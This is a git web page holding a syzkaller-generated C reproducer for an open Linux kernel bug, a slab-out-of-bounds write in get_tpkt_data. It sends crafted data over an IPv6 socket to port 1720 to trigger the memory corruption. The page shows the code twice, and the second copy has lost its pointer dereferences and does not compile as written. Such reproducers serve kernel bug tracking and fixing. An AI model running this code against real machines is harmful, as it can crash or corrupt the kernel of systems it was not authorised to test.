syzkaller-repros/linux/c0819b897eb624b8a59b4cf618831626f0160693.c - pub/scm/linux/kernel/git/shuah/linux-arts - Git at Google

 // KASAN: slab-out-of-bounds Write in get_tpkt_data
 // https://syzkaller.appspot.com/bug?id=c0819b897eb624b8a59b4cf618831626f0160693
 // status:open
 // autogenerated by syzkaller (http://github.com/google/syzkaller)

 #define _GNU_SOURCE
 #include <endian.h>
 #include <stdint.h>
 #include <string.h>
 #include <sys/syscall.h>
 #include <unistd.h>

 uint64_t r[1] = {0xffffffffffffffff};
 void loop()
 {
   long res = 0;
   res = syscall(__NR_socket, 0xa, 1, 0);
   if (res != -1)
     r[0] = res;
   *(uint16_t*)0x20000100 = 0xa;
   *(uint16_t*)0x20000102 = htobe16(0x6b8);
   *(uint32_t*)0x20000104 = 9;
   *(uint64_t*)0x20000108 = htobe64(0);
   *(uint64_t*)0x20000110 = htobe64(1);
   *(uint32_t*)0x20000118 = 0x3f;
   syscall(__NR_sendto, r[0], 0x20000240, 0xfffffe42, 0x20000005, 0x20000100,
           0x1c);
 }

 int main()
 {
   syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
   loop();
   return 0;
 }
	// KASAN: slab-out-of-bounds Write in get_tpkt_data
	// https://syzkaller.appspot.com/bug?id=c0819b897eb624b8a59b4cf618831626f0160693
	// status:open
	// autogenerated by syzkaller (http://github.com/google/syzkaller)

	#define _GNU_SOURCE
	#include <endian.h>
	#include <stdint.h>
	#include <string.h>
	#include <sys/syscall.h>
	#include <unistd.h>

	uint64_t r[1] = {0xffffffffffffffff};
	void loop()
	{
	long res = 0;
	res = syscall(__NR_socket, 0xa, 1, 0);
	if (res != -1)
	r[0] = res;
	(uint16_t)0x20000100 = 0xa;
	(uint16_t)0x20000102 = htobe16(0x6b8);
	(uint32_t)0x20000104 = 9;
	(uint64_t)0x20000108 = htobe64(0);
	(uint64_t)0x20000110 = htobe64(1);
	(uint32_t)0x20000118 = 0x3f;
	syscall(__NR_sendto, r[0], 0x20000240, 0xfffffe42, 0x20000005, 0x20000100,
	0x1c);
	}

	int main()
	{
	syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
	loop();
	return 0;
	}